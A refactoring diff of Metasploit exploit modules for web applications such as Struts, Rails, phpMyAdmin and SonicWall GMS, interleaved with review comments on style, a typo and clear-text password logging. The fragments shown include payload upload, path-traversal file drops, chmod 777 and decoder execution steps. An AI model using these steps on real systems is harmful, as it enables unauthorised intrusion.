The upload probably failed.") + print_error("No new file(s) found. The upload probably failed.") return else - vprint_status("#{peer} - Found these new files: #{files.inspect}") + vprint_status("Found these new files: #{files.inspect}") end # There might be more than 1 new file, at least execute the first 10 diff --git a/modules/exploits/multi/http/phpfilemanager_rce.rb b/modules/exploits/multi/http/phpfilemanager_rce.rb index 5223279b46..2bf5e4a4ac 100644 --- a/modules/exploits/multi/http/phpfilemanager_rce.rb +++ b/modules/exploits/multi/http/phpfilemanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") fail_with(Failure::Unknown, "Failed to trigger the Enter button") end if res && res.headers && res.code == 302 - print_good("#{peer} - Logged in to the file manager") + print_good("Logged in to the file manager") cookie = res.get_cookies cookie else diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index f4a13ff765..662214c355 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpmoadmin_exec.rb b/modules/exploits/multi/http/phpmoadmin_exec.rb index 7c6bcd0db1..48e01b6851 100644 --- a/modules/exploits/multi/http/phpmoadmin_exec.rb +++ b/modules/exploits/multi/http/phpmoadmin_exec.rb 
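Review bot: In the `@@ -194,49 +194,49 @@` hunk of php_volunteer_upload_exec.rb the interpolation `#{payload.encoded.length.to_s}` carries a redundant `.to_s`; interpolation already converts, so `print_status("Uploading PHP payload (#{payload.encoded.length} bytes)")` is enough. qdpm_upload_exec.rb has the same in `@@ -251,7 +251,7 @@` (`#{p.length.to_s}`). The response pattern `/The file was successfuly uploaded/` in the context lines is presumably spelled the way the application prints it, so a comment such as `# sic: matches the application's own spelling` would stop someone from "fixing" it. `exploit` starts above the hunk and continues below it.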
@@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index 07e724ebec..a540ab99c6 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor', 'Description' => %q{ This module exploits an arbitrary code execution backdoor - placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror. + placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb index f08271cfe8..c2a6c602d5 100644 --- a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb +++ b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index 1cb52422ab..567b014c8c 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 298234721b..b9d2ab419a 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb index 6ce71ac09d..63d2cd6da9 100644 --- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb +++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = normalize_uri(uri + "/" + payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb index 85ae5364aa..fddf70ee17 100644 --- a/modules/exploits/multi/http/plone_popen2.rb +++ b/modules/exploits/multi/http/plone_popen2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb index 69eaf74d1e..e0ddb9bc03 100644 --- a/modules/exploits/multi/http/pmwiki_pagelist.rb +++ b/modules/exploits/multi/http/pmwiki_pagelist.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index 340e9c6f02..68596ebef7 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\"")) post_data = data.to_s - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"), @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = "#{upload_dir}#{@payload_name}" - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index e00a483e23..da859cb3f4 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send payload - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, vuln_url), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send login request - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -103,14 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => vars_post }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - print_error("#{peer} - Connection failed") + print_error("Connection failed") return false end if res and res.code == 200 and res.body =~ /Loading styles and images/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = execute_command("echo #{fingerprint}") if res and res.body =~ /#{fingerprint}/ @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe 
@@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote # upload payload code = "<?php #{payload.encoded} ?>" - print_status("#{peer} - Sending payload '#{@fname}' (#{code.length} bytes)") + print_status("Sending payload '#{@fname}' (#{code.length} bytes)") begin res = execute_command("echo \"#{code}\">#{@fname}", { :php_function => php_function } ) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(@fname) else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote upload # execute payload - print_status("#{peer} - Retrieving file '#{@fname}'") + print_status("Retrieving file '#{@fname}'") send_request_cgi({'uri' => normalize_uri(target_uri.path, "#{@fname}")}) end end diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 2b5fe040b1..ff4b154ed1 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote end @clean_files.each do |f| - print_warning("#{peer} - Removing: #{f}") + print_warning("Removing: #{f}") begin if cli.type == 'meterpreter' cli.fs.file.rm(f) @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote cli.shell_command_token("rm #{f}") end rescue ::Exception => e - print_error("#{peer} - Unable to remove #{f}: #{e.message}") + print_error("Unable to remove #{f}: #{e.message}") end end end 
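Review bot: The cleanup loop in qdpm_upload_exec.rb (`@@ -101,7 +101,7 @@`) rescues `::Exception`, which also catches `Interrupt` and `SystemExit`, so an interrupt during cleanup is reported as "Unable to remove" and swallowed. `rescue ::StandardError => e` keeps the best-effort behaviour without trapping signals. In the shell branch, `cli.shell_command_token("rm #{f}")` interpolates the filename unquoted; where `@clean_files` is filled is not visible here, so confirm that its entries cannot contain spaces or shell metacharacters. The method starts above the preceding hunk.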
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0] # Get user data - vprint_status("#{peer} - Enumerating user data") + vprint_status("Enumerating user data") res = send_request_raw({ 'uri' => "#{base}/index.php/home/myAccount", 'cookie' => cookie @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote return {} if not res if res.code == 404 - print_error("#{peer} - #{username} does not actually have a 'myAccount' page") + print_error("#{username} does not actually have a 'myAccount' page") return {} end @@ -208,18 +208,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - Unable to request the file") + print_error("Unable to request the file") return end fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || '' if fname.empty? - print_error("#{peer} - Unable to extract the real filename") + print_error("Unable to extract the real filename") return end # Now that we have the filename, request it - print_status("#{peer} - Uploaded file was renmaed as '#{fname}'") + print_status("Uploaded file was renmaed as '#{fname}'") send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"}) handler end @@ -231,10 +231,10 @@ class Metasploit3 < Msf::Exploit::Remote user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with '#{user}:#{pass}'") + print_status("Attempt to login with '#{user}:#{pass}'") opts = login(base, user, pass) if opts.empty? - print_error("#{peer} - Login unsuccessful") + print_error("Login unsuccessful") return end 
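Review bot: In the `@@ -208,18 +208,18 @@` hunk the rewritten status string still reads `renmaed`. Since the line is being touched anyway, correct it to `print_status("Uploaded file was renamed as '#{fname}'")`. Console output and spool logs are searched for these messages, so the misspelling is worth removing. The enclosing method begins outside the hunk.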
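Review bot: In the `@@ -231,10 +231,10 @@` hunk the rewritten line `print_status("Attempt to login with '#{user}:#{pass}'")` writes the configured password in clear text to the console, and from there into any spool file or saved log that is later shared. Log only the account name, e.g. `print_status("Attempt to login as user '#{user}'")`. The same pattern is on the new side of the `@@ -141,11 +141,11 @@` hunk in modules/exploits/multi/http/sflog_upload_exec.rb, which interpolates `datastore['PASSWORD']` into its status line. The enclosing method continues outside this hunk.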
@@ -251,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload("/tmp/#{bin_name}", bin) end - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") opts = opts.merge({ 'username' => user.scan(/^(.+)\@.+/).flatten[0] || '', 'email' => user, @@ -260,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote }) uploader = upload_php(base, opts) if not uploader - print_error("#{peer} - Unable to upload") + print_error("Unable to upload") return end - print_status("#{peer} - Executing '#{php_fname}'") + print_status("Executing '#{php_fname}'") exec_php(base, opts) end end diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index a8da7d1553..14598f3398 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 9aa9b8e633..c2da81e843 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking #Helper Classes copy/paste from Rails4 diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 29e4072bd1..c6a7904b59 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb index 31e262489c..50cf328ac9 100644 --- a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb +++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif os == 'linux' && target.name =~ /Windows/ fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected") elsif os.nil? - print_warning("#{peer} - Failed to detect remote operating system, trying anyway...") + print_warning("Failed to detect remote operating system, trying anyway...") end if target.name =~ /Windows.*VB/ @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64" exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) vbs = generate_decoder_vbs({ 
@@ -137,13 +137,13 @@ class Metasploit3 < Msf::Exploit::Remote :encoded_file_name => encoded_file_name, :exe_file_name => exe_file_name }) - print_status("#{peer} - Dropping the VBS decoder to filesystem...") + print_status("Dropping the VBS decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", vbs) register_files_for_cleanup("C:#{temp}#{decoder_file_name}") register_files_for_cleanup("C:#{temp}#{encoded_file_name}") register_files_for_cleanup("C:#{temp}#{exe_file_name}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}") end @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh" elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) decoder = <<-SH @@ -172,17 +172,17 @@ chmod 777 #{temp}#{elf_file_name} #{temp}#{elf_file_name} SH - print_status("#{peer} - Dropping the decoder to filesystem...") + print_status("Dropping the decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", decoder) register_files_for_cleanup("#{temp}#{decoder_file_name}") register_files_for_cleanup("#{temp}#{encoded_file_name}") register_files_for_cleanup("#{temp}#{elf_file_name}") - print_status("#{peer} - Giving execution permissions to the decoder...") + print_status("Giving execution permissions to the decoder...") execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}") - print_status("#{peer} - Executing decoder and payload...") + print_status("Executing decoder and payload...") execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}") end 
@@ -191,12 +191,12 @@ SH elf = rand_text_alpha(4 + rand(4)) traversal = "/.." * traversal_depth - print_status("#{peer} - Dropping payload...") + print_status("Dropping payload...") write_file("#{traversal}#{temp}#{elf}", payload.encoded) register_files_for_cleanup("#{temp}#{elf}") - print_status("#{peer} - Providing execution permissions...") + print_status("Providing execution permissions...") execute("#{traversal}/bin/chmod 777 #{temp}#{elf}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}#{temp}#{elf}") end diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index cecbbc0ad0..e9f198bd6c 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb +++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/admin/manage.php", @@ -120,15 +120,15 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end target_path = "#{base}/blogs/download/uploads/#{php_fname}" - print_status("#{peer} - Requesting '#{target_path}'...") + print_status("Requesting '#{target_path}'...") res = send_request_raw({'uri'=>target_path}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end 
@@ -141,11 +141,11 @@ class Metasploit3 < Msf::Exploit::Remote uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") cookie = do_login(base) if cookie.empty? - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end diff --git a/modules/exploits/multi/http/simple_backdoors_exec.rb b/modules/exploits/multi/http/simple_backdoors_exec.rb index 4b23877fda..0725b0f74f 100644 --- a/modules/exploits/multi/http/simple_backdoors_exec.rb +++ b/modules/exploits/multi/http/simple_backdoors_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index f854d6483b..92568c6f94 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb index 077c327a73..d4de32cf5c 100644 --- a/modules/exploits/multi/http/snortreport_exec.rb +++ b/modules/exploits/multi/http/snortreport_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb index 044b7584f6..4735a2872e 100644 
--- a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb +++ b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...") + print_status("Uploading Information Gathering JSP #{jsp_info}...") if upload(jsp_info, jsp_path) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed") end @@ -75,17 +75,17 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, jsp_info)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") - print_warning("#{peer} - #{jsp_info} needs to be deleted manually") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") + print_warning("#{jsp_info} needs to be deleted manually") end jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end 
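Review bot: In the `@@ -64,9 +64,9 @@` hunk the success message after uploading the information-gathering JSP is `print_good("JSP payload uploaded successfully")`. The next hunk prints the same text for the actual payload upload, so the run log cannot tell the two uploads apart. Consider `print_good("Information Gathering JSP #{jsp_info} uploaded successfully")` for the first one, which also records the file name that may need manual cleanup.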
@@ -93,10 +93,10 @@ class Metasploit3 < Msf::Exploit::Remote if upload_path register_file_for_cleanup(::File.join(upload_path, jsp_payload)) else - print_warning("#{peer} - #{jsp_payload} needs to be deleted manually") + print_warning("#{jsp_payload} needs to be deleted manually") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index e35f6bf4b7..2f9e672522 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -158,13 +158,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get Tomcat installation path - print_status("#{peer} - Retrieving Tomcat installation path...") + print_status("Retrieving Tomcat installation path...") if install_path.nil? fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path") end - print_good("#{peer} - Tomcat installed on #{install_path}") + print_good("Tomcat installed on #{install_path}") if target['Platform'] == "java" exploit_java @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_java - print_status("#{peer} - Uploading WAR file") + print_status("Uploading WAR file") app_base = rand_text_alphanumeric(4+rand(32-4)) war = payload.encoded_war({ :app_name => app_base }).to_s 
@@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable file") + print_status("Uploading executable file") exe = payload.encoded_exe exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8)) if target['Platform'] == "win" diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index c23d9b5a41..c96fe4d48d 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 20066ea72b..6d574aeaaf 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index 9c17ad00f3..832cef2473 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index 49b6c061b4..857c460402 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index a629668198..692c8b44b8 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 79a444c8dc..4893376653 100644 --- 